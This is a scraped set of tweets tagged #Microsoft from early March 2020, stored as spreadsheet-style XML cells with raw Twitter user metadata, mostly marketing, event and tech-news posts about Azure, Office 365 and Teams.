    <t>{'id': 1191674404419309573, 'id_str': '1191674404419309573', 'name': 'Richard Halliday-Pegg', 'screen_name': 'Identity_Rhp', 'location': 'London', 'description': 'Alliances and Presales Business Development Manager at @IdentityExperts.\nAll views are my own.', 'url': 'https://t.co/M4T2z8oHwz', 'entities': {'url': {'urls': [{'url': 'https://t.co/M4T2z8oHwz', 'expanded_url': 'http://www.identityexperts.co.uk', 'display_url': 'identityexperts.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 40, 'listed_count': 0, 'created_at': 'Tue Nov 05 11:11:40 +0000 2019', 'favourites_count': 194, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 99, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1191674545905819648/znpekfE3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1191674545905819648/znpekfE3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1191674404419309573/1572952754',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</si>
  <si>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09:57:18 +0000 2020</t>
  </si>
  <si>
    <t>How to manage Windows Server 2019 like a boss https://t.co/AWayukFPgB #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 09:57:12 +0000 2020</t>
  </si>
  <si>
    <t>Resulticks recognized for "Elevating Customer Experience with AI" at the #Microsoft AI Awards 2.0 
https://t.co/87HfEFhlNX</t>
  </si>
  <si>
    <t>{'id': 937962626222497793, 'id_str': '937962626222497793', 'name': 'Devdiscourse', 'screen_name': 'dev_discourse', 'location': 'National Capital Region', 'description': "Devdiscourse: World's leading Website for International Development News, Opinions, Interviews and Breaking News.", 'url': 'https://t.co/CELXEGzKqt', 'entities': {'url': {'urls': [{'url': 'https://t.co/CELXEGzKqt', 'expanded_url': 'https://www.devdiscourse.com', 'display_url': 'devdiscourse.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 79873, 'friends_count': 679, 'listed_count': 63, 'created_at': 'Tue Dec 05 08:31:31 +0000 2017', 'favourites_count': 914, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 276015,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'http://pbs.twimg.com/profile_images/994485257327046656/8DSy51HP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/994485257327046656/8DSy51HP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/937962626222497793/1573131283',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</si>
  <si>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09:56:03 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that you can easily test your website, blog and social channels using #Microsoft's free #Partner #Benchmarking Tool? It takes a few minutes to produce an easy to read scorecard. See here https://t.co/ynJMK0otDC https://t.co/dN3aKwZH1I</t>
  </si>
  <si>
    <t>{'id': 1230447967196372992, 'id_str': '1230447967196372992', 'name': 'Bytes Partners', 'screen_name': 'Bytes_Partners', 'location': 'United Kingdom', 'description': 'Bytes are specialists in #Cloud technology, #Licensing, Software Asset Management (#SAM), #Security and back up, #Virtualisation and Storage Solutions.', 'url': 'https://t.co/KEA2mOD8U5', 'entities': {'url': {'urls': [{'url': 'https://t.co/KEA2mOD8U5', 'expanded_url': 'http://www.bytes.co.uk', 'display_url': 'bytes.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 2, 'listed_count': 0, 'created_at': 'Thu Feb 20 11:04:03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'http://pbs.twimg.com/profile_images/1230448679967789059/TO-Ix4Il_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230448679967789059/TO-Ix4Il_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1230447967196372992/1582201010',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</si>
  <si>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09:52:45 +0000 2020</t>
  </si>
  <si>
    <t>join us in a final farewell as another bit of #Microsoft consumer tech heads into a dusty drawer of abandoned dreams, alongside the Band, the Kin, Media Center, Zune, Home Server, #Cortana turns its back on consumers as skills are stripped from #Windows10 https://t.co/AptQyZpHYu</t>
  </si>
  <si>
    <t>{'id': 2853792412, 'id_str': '2853792412', 'name': 'Si esq.', 'screen_name': 'SimonCTester', 'location': 'London / Kent', 'description': 'Waterloo Bridge : an amazing view to the lights shining in the City of the World. Support Independent Business OKS', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1787, 'friends_count': 4908, 'listed_count': 92, 'created_at': 'Fri Oct 31 20:35:20 +0000 2014', 'favourites_count': 14851, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11250,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'http://pbs.twimg.com/profile_images/555002118369980416/_M22Jk3r_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/555002118369980416/_M22Jk3r_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2853792412/1442804791',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</si>
  <si>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09:50:06 +0000 2020</t>
  </si>
  <si>
    <t>.@phusionim secures Microsoft Gold partnership to boost innovation 
https://t.co/N19CrZ4T3B
#engineering #im #data #consultancy #oilandgasindustry #microsoft #microsoftgold #software #digital #datamanagement https://t.co/bcL5S2jlEs</t>
  </si>
  <si>
    <t>{'id': 157994470, 'id_str': '157994470', 'name': 'Recognition PR', 'screen_name': 'Recognition1st', 'location': '', 'description': 'National PR firm based in Northern England serving some great clients! Charges on our web site call us on 01325 363436', 'url': 'http://t.co/0KuHSyT0Im', 'entities': {'url': {'urls': [{'url': 'http://t.co/0KuHSyT0Im', 'expanded_url': 'http://www.recognitionpr.co.uk', 'display_url': 'recognitionpr.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2221, 'friends_count': 976, 'listed_count': 93, 'created_at': 'Mon Jun 21 13:17:43 +0000 2010', 'favourites_count': 268, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 18550,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'http://pbs.twimg.com/profile_images/1178437578/PR_v2.Logo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1178437578/PR_v2.Logo_normal.jpg',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</si>
  <si>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09:47:55 +0000 2020</t>
  </si>
  <si>
    <t>Invent with purpose, realize cost savings, and make your organization more efficient with Microsoft Azure's open and flexible cloud computing platform. #azure #microsoft #office365 #cloud #microsoftazure https://t.co/bTMY0fGsJI https://t.co/Y02vWzYoM7</t>
  </si>
  <si>
    <t>{'id': 868040812634005504, 'id_str': '868040812634005504', 'name': 'Lesedi Lebogo', 'screen_name': 'dee_lebogo', 'location': 'Pretoria south Africa', 'description': 'Entrepreneur | Project Manager | Business Adviser | CEO @techroidict', 'url': 'https://t.co/qWES1mB8Jp', 'entities': {'url': {'urls': [{'url': 'https://t.co/qWES1mB8Jp', 'expanded_url': 'http://www.techroid.co.za', 'display_url': 'techroid.co.za', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 361, 'friends_count': 1941, 'listed_count': 3, 'created_at': 'Fri May 26 09:47:11 +0000 2017', 'favourites_count': 328, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 458, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1233648473091821568/iIFZ6X55_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233648473091821568/iIFZ6X55_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/868040812634005504/1581074316',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</si>
  <si>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09:47:47 +0000 2020</t>
  </si>
  <si>
    <t>Get Ready to explore CLOUD! Join us to know "How will you save cost in Cloud?"
Register Here: https://t.co/XJpg8Kvun3
#SynergeticsConsulting #CloudThursday #WebinarSeries #Session4 #Cost #Optimisation #Cloud #CloudComputing #Microsoft #Azure #Technology https://t.co/zj1QZB0FhY</t>
  </si>
  <si>
    <t>Wed Mar 04 09:47:21 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Azure has endless capabilities - learn how to advance at speed with our experts. Book a Free 1-2-1 #Azure Workshop with Bytes to discover more about the benefits of Azure, workload migrations and cost optimisation. Click to register https://t.co/P87VqNOLF7 https://t.co/elXisY4OKJ</t>
  </si>
  <si>
    <t>{'id': 123226134, 'id_str': '123226134', 'name': 'Bytes Software', 'screen_name': 'Bytes_Software', 'location': 'United Kingdom', 'description': 'Bytes specialise in Licensing, #Software Asset Management (#SAM), #Microsoft licensing, #Cloud, #Virtualisation and #Storage solutions https://t.co/kKJi8XaknO', 'url': 'https://t.co/KEA2mOD8U5', 'entities': {'url': {'urls': [{'url': 'https://t.co/KEA2mOD8U5', 'expanded_url': 'http://www.bytes.co.uk', 'display_url': 'bytes.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/kKJi8XaknO', 'expanded_url': 'http://bit.ly/BytesLinkedin', 'display_url': 'bit.ly/BytesLinkedin', 'indices': [135, 158]}]}}, 'protected': False, 'followers_count': 2671, 'friends_count': 4615, 'listed_count': 246, 'created_at': 'Mon Mar 15 11:58:24 +0000 2010', 'favourites_count': 84, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7603, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FAFAFA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/820331124270465025/EkgI91pB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/820331124270465025/EkgI91pB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/123226134/1556703119',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</si>
  <si>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Wed Mar 04 09:47:08 +0000 2020</t>
  </si>
  <si>
    <t>FREE EVENT: Codeless AI Apps in Microsoft Office 365 Powerapps
In collaboration with @CloudstreetC @ntpowerplatform 
RSVP https://t.co/ufw1yx6g9y  
https://t.co/Cm3x8FdkI9 
#powerbi #microsoft #powerapps #dashboard #businessintelligence #data #dataanalytics  #microsoftpowerbi https://t.co/8xvc2hY7s5</t>
  </si>
  <si>
    <t>Wed Mar 04 09:44:57 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft plans to eliminate carbon footprints https://t.co/fpkMZiVKnj #carbonfootprints</t>
  </si>
  <si>
    <t>{'id': 896283301425623040, 'id_str': '896283301425623040', 'name': 'JBKlutse.com', 'screen_name': 'jbklutseblog', 'location': 'Ghana', 'description': "Building Africa's Authoritative #Tech Blog from Ghana\n\nFor advert enquires, call +233272839333 or email info@jbklutse.com", 'url': 'https://t.co/d3Fk22dtgo', 'entities': {'url': {'urls': [{'url': 'https://t.co/d3Fk22dtgo', 'expanded_url': 'http://www.jbklutse.com', 'display_url': 'jbklutse.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1331, 'friends_count': 301, 'listed_count': 7, 'created_at': 'Sat Aug 12 08:12:45 +0000 2017', 'favourites_count': 435, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9358, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1206126461163360258/6hqEohIx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206126461163360258/6hqEohIx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/896283301425623040/1574520927',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</si>
  <si>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09:42:21 +0000 2020</t>
  </si>
  <si>
    <t>A little bit of #wednesdaywisdom from Satya Nadella to start your day...
#microsoft #satyanadella https://t.co/C4Kgi3D4RL</t>
  </si>
  <si>
    <t>{'id': 937739653217734656, 'id_str': '937739653217734656', 'name': 'PragmatiQ Solutions', 'screen_name': 'PragmatiQSols', 'location': 'Milton Keynes, England', 'description': 'We design and implement bespoke #CRM systems, to support businesses increase sales, customer retention and more. #MSDyn365', 'url': 'https://t.co/o887hzYyJV', 'entities': {'url': {'urls': [{'url': 'https://t.co/o887hzYyJV', 'expanded_url': 'http://www.pragmatiqsolutions.co.uk', 'display_url': 'pragmatiqsolutions.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 185, 'friends_count': 216, 'listed_count': 3, 'created_at': 'Mon Dec 04 17:45:30 +0000 2017', 'favourites_count': 572, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 817,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'http://pbs.twimg.com/profile_images/939456546421067776/5KCcxDvc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/939456546421067776/5KCcxDvc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/937739653217734656/1569254873', 'profile_link_color': '188CC9',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</si>
  <si>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09:42:20 +0000 2020</t>
  </si>
  <si>
    <t>#HaloTheMasterChiefCollection for #PC  Halo: Combat Evolved Anniversary now available https://t.co/npYNYg9lud #Microsoft</t>
  </si>
  <si>
    <t>{'id': 15777900, 'id_str': '15777900', 'name': 'Keithmaxx von Garreg Mach', 'screen_name': 'keithmaxx', 'location': 'Japan, Singapore, Philippines, United States', 'description': 'A mishmash of the best of Games, Tech, Travel, and Japanese Culture.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 198, 'friends_count': 156, 'listed_count': 118, 'created_at': 'Fri Aug 08 13:49:10 +0000 2008', 'favourites_count': 832, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18497,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'http://pbs.twimg.com/profile_images/1156012190580662274/D1P4oCO-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1156012190580662274/D1P4oCO-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15777900/1560916317', 'profile_link_color': '19CF86',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</si>
  <si>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09:42:15 +0000 2020</t>
  </si>
  <si>
    <t>The one and only @LucyAliceBourne from #Microsoft doing the keynote at the 2nd day of our @inc_group_uk #DynamicsForum in #Glasgow.
Lucy,we love your dress just as much as we love your session on embracing the art of possible with MS business apps
Thank u for being here with us https://t.co/e498GYZprs</t>
  </si>
  <si>
    <t>Wed Mar 04 09:38:11 +0000 2020</t>
  </si>
  <si>
    <t>#sharepointonline makes it easy to store, share and manage #digitaldata within the organization. Our experts will guide you on developing your custom workflows,forms &amp;amp; much more. 
Learn more: https://t.co/WLuclA4EZb
#microsoft #office365 #datasecurity  #exquitech https://t.co/oMC7pI3pCV</t>
  </si>
  <si>
    <t>Wed Mar 04 09:37:57 +0000 2020</t>
  </si>
  <si>
    <t>A free boost on your journey to #Azure expert thanks to #Microsoft and @pluralsight. Highly recommended for any aspiring #cloud professional.
https://t.co/atxmpCRZD7
#leadership #technology #innovation #ImagineItDone</t>
  </si>
  <si>
    <t>{'id': 4360317315, 'id_str': '4360317315', 'name': 'ITMAGINATION', 'screen_name': 'ITMAGINATION', 'location': 'Warsaw, Poland', 'description': 'We are helping our clients to innovate by providing professional software development services, data analytics and outsourcing.', 'url': 'https://t.co/TlM4hJbPSc', 'entities': {'url': {'urls': [{'url': 'https://t.co/TlM4hJbPSc', 'expanded_url': 'http://www.itmagination.com', 'display_url': 'itmagination.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 225, 'friends_count': 412, 'listed_count': 16, 'created_at': 'Thu Dec 03 10:34:08 +0000 2015', 'favourites_count': 252, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 727,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'http://pbs.twimg.com/profile_images/1197121366736166913/tmFQjrwE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197121366736166913/tmFQjrwE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4360317315/1581418267',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</si>
  <si>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09:35:48 +0000 2020</t>
  </si>
  <si>
    <t>Fileless attack detection for Linux in preview
#IFITech #Microsoft #Azure #Cloud #Security
https://t.co/a1ndWeZrDo</t>
  </si>
  <si>
    <t>{'id': 3194569794, 'id_str': '3194569794', 'name': 'IFI Techsolutions Pvt Ltd', 'screen_name': 'IFITech', 'location': 'Mumbai, India', 'description': 'A Born In Cloud Microsoft Gold Partner.', 'url': 'https://t.co/zdVPwGgBze', 'entities': {'url': {'urls': [{'url': 'https://t.co/zdVPwGgBze', 'expanded_url': 'http://ifi.tech', 'display_url': 'ifi.tech', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 194, 'friends_count': 145, 'listed_count': 3, 'created_at': 'Wed May 13 18:39:29 +0000 2015', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 497,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'http://pbs.twimg.com/profile_images/1161541750084788229/ol40mGaV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161541750084788229/ol40mGaV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3194569794/1503408600',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</si>
  <si>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09:35:09 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone
#IFITech #Microsoft #Azure #Cloud #ExpressRoute #Network
https://t.co/f4r3ckJM9H</t>
  </si>
  <si>
    <t>Wed Mar 04 09:34:19 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020
#IFITech #Microsoft #Azure #Cloud #CostManagement #Billing
https://t.co/vlNChRGEu5</t>
  </si>
  <si>
    <t>Wed Mar 04 09:33:15 +0000 2020</t>
  </si>
  <si>
    <t>Mindware Marketing Team is attending the Microsoft marketing session at the beautiful Grosvenor House this morning. We thank Team Microsoft for the invite and for the updates on the new GTM.
#mindware #microsoft https://t.co/z1BcvT7lrQ</t>
  </si>
  <si>
    <t>Wed Mar 04 09:32:17 +0000 2020</t>
  </si>
  <si>
    <t>Leading #tech stocks yesterday registered significant price drops, after going in the opposite direction in the previous session #Amazon was down more than 2%, #Apple &amp;amp; #Google were down more than 3%, #Microsoft closed more than 4% lower and #Facebook was down more than 5% #etoro https://t.co/UeJNp9PrVG</t>
  </si>
  <si>
    <t>{'id': 1227909192612229121, 'id_str': '1227909192612229121', 'name': 'ToroTraderX.com', 'screen_name': 'ToroTraderX', 'location': 'City of London, London', 'description': 'eToro Trader / Micro Investor | Stocks | Commodities | Crypto | Indices | Currency ðŸ‡¬ðŸ‡§ ðŸ‘¨ðŸ»\u200dðŸ’» ADR Trading Group ðŸ‘©ðŸ¼\u200dðŸ’» - https://t.co/U3vj6LRfoA', 'url': 'https://t.co/X7NdVRIx1L', 'entities': {'url': {'urls': [{'url': 'https://t.co/X7NdVRIx1L', 'expanded_url': 'http://torotraderx.com', 'display_url': 'torotraderx.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/U3vj6LRfoA', 'expanded_url': 'http://blog.torotraderx.com', 'display_url': 'blog.torotraderx.com', 'indices': [116, 139]}]}}, 'protected': False, 'followers_count': 55, 'friends_count': 171, 'listed_count': 0, 'created_at': 'Thu Feb 13 10:55:53 +0000 2020', 'favourites_count': 109, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 166, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1228058745571282946/GTqqwtgI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228058745571282946/GTqqwtgI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1227909192612229121/1582048186',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</si>
  <si>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09:31:02 +0000 2020</t>
  </si>
  <si>
    <t>Azure training today. #perth #microsoft #azure https://t.co/yAxGWOt404</t>
  </si>
  <si>
    <t>{'id': 1228096833072726016, 'id_str': '1228096833072726016', 'name': 'FourSwordsAUS', 'screen_name': 'fourswordsAUS', 'location': 'Australia', 'description': 'FourSwords are a likeminded group of individuals with a common goal of developing Smart Contracts through the use of Blockchain Technologies.', 'url': 'https://t.co/bsPUwHLj3O', 'entities': {'url': {'urls': [{'url': 'https://t.co/bsPUwHLj3O', 'expanded_url': 'http://fourswords.io', 'display_url': 'fourswords.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 26, 'friends_count': 70, 'listed_count': 1, 'created_at': 'Thu Feb 13 23:21:41 +0000 2020', 'favourites_count': 106, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 94, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1228097073108512768/RDb1gtxO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228097073108512768/RDb1gtxO_normal.jpg',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</si>
  <si>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09:30:29 +0000 2020</t>
  </si>
  <si>
    <t>Join us for our first tech meetup of 2020 where our team of experts will talk on Intelligent Work and the Journey to a Connected Enterprise. Spaces are limited so register now to secure your seat:
https://t.co/Sk2xvaUZJC #techmeetup #techtalks #microsoft #tech #intelligentwork https://t.co/tSHu1WOs01</t>
  </si>
  <si>
    <t>{'id': 275095923, 'id_str': '275095923', 'name': 'Zarion', 'screen_name': 'ZarionSoftware', 'location': 'Dublin, Ireland', 'description': 'Our Intelligent Work Software empowers people and teams across Financial Services be more productive, every day.', 'url': 'http://t.co/jX9RHDNxHQ', 'entities': {'url': {'urls': [{'url': 'http://t.co/jX9RHDNxHQ', 'expanded_url': 'http://www.zarion.com', 'display_url': 'zarion.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 558, 'friends_count': 1402, 'listed_count': 113, 'created_at': 'Thu Mar 31 16:31:27 +0000 2011', 'favourites_count': 441, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1339, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '08ADEC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1219983999730319362/xWCA-rJC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219983999730319362/xWCA-rJC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/275095923/1579701828', 'profile_link_color': '021151',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</si>
  <si>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09:27:48 +0000 2020</t>
  </si>
  <si>
    <t>How to #manage #WindowsServer 2019 like a #boss https://t.co/sIhjlFdHi4 #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Wed Mar 04 09:22:08 +0000 2020</t>
  </si>
  <si>
    <t>Quantum Impact: Computing a more sustainable future (Ep. 1)  https://t.co/pMKxKRcc3b  #Quantum #Microsoft #Environment #Cloud https://t.co/CJHAYhm6pT</t>
  </si>
  <si>
    <t>Quantum Impact: Computing a more sustainable future (Ep. 1)  https://t.co/knzJOtcGoE  #Quantum #Microsoft #Environment #Cloud https://t.co/5i0tCuFX50</t>
  </si>
  <si>
    <t>Wed Mar 04 09:17:28 +0000 2020</t>
  </si>
  <si>
    <t>Running Windows in #Linux: VirtualBox Configuration #LinuxMint #UpdateAssistant #Ubuntu #Microsoft... https://t.co/169YYONrcX https://t.co/PUePBA2Hv7</t>
  </si>
  <si>
    <t>Wed Mar 04 09:17:14 +0000 2020</t>
  </si>
  <si>
    <t>Google and Microsoft are giving away enterprise conferencing tools due to coronavirus #MicrosoftTeams #Office365 #Microsoft https://t.co/AWx2WEq3Rf</t>
  </si>
  <si>
    <t>Wed Mar 04 09:17:13 +0000 2020</t>
  </si>
  <si>
    <t>@ICT4DConference @thresholdworld Thank you @ICT4DConference! - we're honored to support the conference and looking forward to learning from the community.  #ICT4D2020 #Microsoft #Tech4Good #NonprofitCommonDataModel</t>
  </si>
  <si>
    <t>{'id': 65980347, 'id_str': '65980347', 'name': 'Dan Lammot', 'screen_name': 'danlammot', 'location': 'Philly', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 829, 'friends_count': 695, 'listed_count': 84, 'created_at': 'Sat Aug 15 21:20:09 +0000 2009', 'favourites_count': 662, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1747,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'http://pbs.twimg.com/profile_images/378800000136001939/c1d0d8f2ea87a46cba8c888ad2c4bed4_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000136001939/c1d0d8f2ea87a46cba8c888ad2c4bed4_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/65980347/1434927537',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</si>
  <si>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09:17:11 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft announced plans to open a datacenter region in Spain to help accelerate #digitaltransformation of public and private entities of all sizes. https://t.co/bJlsWg2n0F</t>
  </si>
  <si>
    <t>Wed Mar 04 09:16:09 +0000 2020</t>
  </si>
  <si>
    <t>We @eComScotland Microsoft accredited company, using the #Microsoft technology stack (https://t.co/V1dfKunNwF, C# and SQL Server), Mobile (Unity and Angular) and standard web tech (HTML5, JavaScript, jQuery, CSS) - Join us as we open our #Edinburgh hub https://t.co/B5IR36I79k</t>
  </si>
  <si>
    <t>{'id': 1230089857, 'id_str': '1230089857', 'name': 'Wendy Edie', 'screen_name': 'eCom_Wendy', 'location': '', 'description': '@ecomscotland @eComelearning MD of the most established Learning Technology Company in #Scotland. @WEScotland Ambassador and @GirlguidingScot Rainbow Leader.', 'url': 'https://t.co/F72zeXWXtp', 'entities': {'url': {'urls': [{'url': 'https://t.co/F72zeXWXtp', 'expanded_url': 'http://www.ecomscotland.com', 'display_url': 'ecomscotland.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1216, 'friends_count': 3478, 'listed_count': 88, 'created_at': 'Fri Mar 01 15:17:42 +0000 2013', 'favourites_count': 3676, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2730,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'http://pbs.twimg.com/profile_images/1187325305297473537/0oAWKfdm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1187325305297473537/0oAWKfdm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1230089857/1566990903',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</si>
  <si>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09:10:35 +0000 2020</t>
  </si>
  <si>
    <t>Magic Leap One AR Headset 3D model
#magic #leap #one #creator #edition #ar #vr #headset #augmented #virtual #mixed #reality #goggles #oculus #go #microsoft #hololens #samsung #video #game #electronics #other @CG_Trader 
Learn more:  https://t.co/PG1rAJ5H1s https://t.co/TdBqfzGhCQ</t>
  </si>
  <si>
    <t>{'id': 4901061514, 'id_str': '4901061514', 'name': 'Kanal3D', 'screen_name': 'kanal3d', 'location': 'Tbilisi, Georgia', 'description': '3D Artist\n#3d #3dsmax #vray #3dmodels #zbrush #model #for #purchasing', 'url': 'https://t.co/WO88CMM8fn', 'entities': {'url': {'urls': [{'url': 'https://t.co/WO88CMM8fn', 'expanded_url': 'https://www.turbosquid.com/Search/Artists/kanal3d?referral=kanal3d', 'display_url': 'turbosquid.com/Search/Artistsâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1726, 'friends_count': 4696, 'listed_count': 16, 'created_at': 'Fri Feb 12 11:17:17 +0000 2016', 'favourites_count': 1394, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 368, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1031645096679235584/1k8hpkHD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1031645096679235584/1k8hpkHD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4901061514/1546603121',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</si>
  <si>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09:09:23 +0000 2020</t>
  </si>
  <si>
    <t>Demonstration on how to collaborate and stay productive through Teams  with the Digital Advisor from Microsoft Tina Damaskou 
#MITA #Microsoft #Teams #outlook365 https://t.co/JZ3NMDzFUq</t>
  </si>
  <si>
    <t>Wed Mar 04 09:08:34 +0000 2020</t>
  </si>
  <si>
    <t>@microsoft the instant search is broken on Windows 10, I updated and now I have to hit enter to search, whereas before it instantly searched. #microsoft #search #Windows10 #windows10help What do I do? https://t.co/sGK1JKNaj0</t>
  </si>
  <si>
